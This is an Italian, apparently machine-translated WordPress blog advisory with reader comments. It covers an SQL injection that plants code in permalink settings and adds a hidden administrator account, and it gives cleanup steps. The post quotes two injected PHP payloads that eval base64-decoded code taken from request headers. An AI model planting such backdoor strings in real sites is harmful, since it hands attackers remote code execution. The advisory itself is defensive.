Molti siti sono stati colpiti da un recente attacco SQL in cui vengono iniettati codici nel sito. Questa iniezione MySQL colpisce i permalink rendendoli inefficaci. Di conseguenza, gli URL degli articoli del blog non funzionano. Numerosi blog WordPress sono stati colpiti da questo attacco. Grazie a Andy Soward per averci segnalato questo problema.
Uno dei seguenti codici è stato aggiunto alla struttura dei permalink a causa di questo attacco:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Queste virgolette hanno aggiunto tutti i permalink del sito e possono essere modificate solo se rimosse manualmente.
Per correggere questo problema andare su:
Impostazioni > permalink e rimuovete il codice di cui sopra e sostituitelo con quello predefinito.
La prossima cosa da fare è andare su Utenti. Si vedrà che ci sono più amministratori. Non vedrete il loro nome elencato, ma vedrete che il conteggio è aumentato. È quindi necessario esaminare tutti gli utenti e trovare l’ultimo che si è registrato. Posizionare il mouse su quell’utente e ottenere il collega. Modificare il codice userid= aggiungendo 1 al numero. Quindi, se l’ultimo utente che si può vedere è stato l’utente numero 2, aggiungere 1 al codice e renderlo 3. Si dovrebbe scoprire che l’amministratore nascosto ha uno strano codice come nome. Eliminare il codice e renderlo un abbonato. Poi return ed elimina l’utente.
Questo dovrebbe correggere il problema. È anche possibile eliminare l’utente semplicemente andando nel proprio PHPMyAdmin. Perché lì si vedrà l’utente.
Volevamo solo diffondere questa notizia il prima possibile, in modo che i nostri utenti possano essere aggiornati. NON SI TRADUCE di controllare che il vostro blog non sia infetto. Ci auguriamo che WordPress presenti presto una versione.
Inoltre, se non avete ancora implementato alcune di queste misure per proteggere la vostra area amministrativa di WordPress.
Syed Balkhi
Hey WPBeginner readers,
Did you know you can win exciting prizes by commenting on WPBeginner?
Every month, our top blog commenters will win HUGE rewards, including premium WordPress plugin licenses and cash prizes.
You can get more details about the contest from here.
Start sharing your thoughts below to stand a chance to win!
ahmed_alaaedin
The database of my website has been injected few days ago, adding some strange characters and words after each post or page URL. I couldn’t find anything strange in the settings: permalinks or in the users menu. What to do to fix this problem, please? My hosting company has a backup of the infected database as well!
a wordpress user
i was hit by this twice.
first time it was wassup plugin sql injection, this time im not sure. my hosting provider has blocked me.
once they restore my a/c i will remove wordpres.. I have had it!
Editorial Staff
Perhaps its not WordPress fault, maybe your hosting security is just not as good…
Admin
Joey
What did you figure out with this? I was just hit with same issue. All my WP sites on my account are suffering the same problem.
lerrkin
Hi.
Interesting url https://www.wpbeginner.com/wp-tutorials/11-vital-tips-and-hacks-to-protect-your-wordpress-admin-area/ linked from here shows blank page.
Code contains this comment: ‘‘.
That’s WP Super Cache’s bug http://wordpress.org/support/topic/315446, and it seems present here… So update WP Super Cache, please. I hope read that tips soon
Editorial Staff
We really appreciate this comment, the issue was not with the WP Super Cache, we believe it was the plugin called WP External Link. We uninstalled and reinstalled WP-Super Cache twice, but then we compared the development server where everything worked fine. The difference was this plugin. When we removed that plugin it worked. You may now read that post.
Admin
lerrkin
Maybe that was WP External Link and Super Cache conflict…
I see my pasted WP-Super-Cache html comment above works as html comment and is invisible Text was “Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
So last Super Cache ver. promises to do not html validity check.
Oh, I’m reading!
Thanks a lot!
Roseli A. Bakar
Thanks for highlighting this